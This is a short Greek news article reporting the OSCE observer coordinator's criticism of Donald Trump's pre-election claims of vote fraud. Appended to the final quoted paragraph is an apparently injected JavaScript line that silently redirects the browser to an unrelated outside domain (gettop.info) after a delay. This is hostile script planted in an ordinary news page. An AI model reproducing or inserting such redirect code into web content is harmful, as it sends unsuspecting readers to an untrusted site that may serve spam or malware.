ΟΑΣΕ: Φθηνοί ισχυρισμοί του Τραμπ για πιθανή νοθεία

0
3

 

Ο ΟΑΣΕ κατήγγειλε τον Ντόναλντ Τραμπ για τους ισχυρισμούς του να υπάρξει νοθεία στις προεδρικές εκλογές των ΗΠΑ.

Μιλώντας στον αυστριακό ραδιοφωνικό σταθμό Oe1 η συντονίστρια της αποστολής παρατηρητών του Οργανισμού, Κριστίνε Μουτόνεν, μέλος του αυστριακού κοινοβουλίου και πρόεδρος της Κοινοβουλευτικής Συνέλευσης του ΟΑΣΕ, εξήγησε: «Πειστικοί ισχυρισμοί για νοθεία θα πρέπει να λαμβάνονται σοβαρά υπόψη και να ερευνώνται προσεκτικά (…) Όμως φθηνοί ισχυρισμοί μπορεί να έχουν βλαβερές συνέπειες, δημιουργώντας μια ατμόσφαιρα έντασης και δυσπιστίας».

Στη διάρκεια της προεκλογικής του εκστρατείας ο Τραμπ ισχυρίστηκε αρκετές φορές ότι θα υπάρξει «νοθεία» στις προεδρικές εκλογές των ΗΠΑ, φτάνοντας μάλιστα ως το σημείο να πει ότι δεν δεσμεύεται να αναγνωρίσει το αποτέλεσμα.

«Έχουμε συχνά ακούσει ισχυρισμούς για νοθεία από υποψήφιους σε εκλογές. Όμως αυτοί προέρχονται συνήθως από χώρες που βγαίνουν από ολοκληρωτικά καθεστώτα ή από συγκρούσεις: προκαλεί έκπληξη να ακούγονται στην πιο παλιά κοινοβουλευτική δημοκρατία του κόσμου», επεσήμανε η Μουτόνεν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here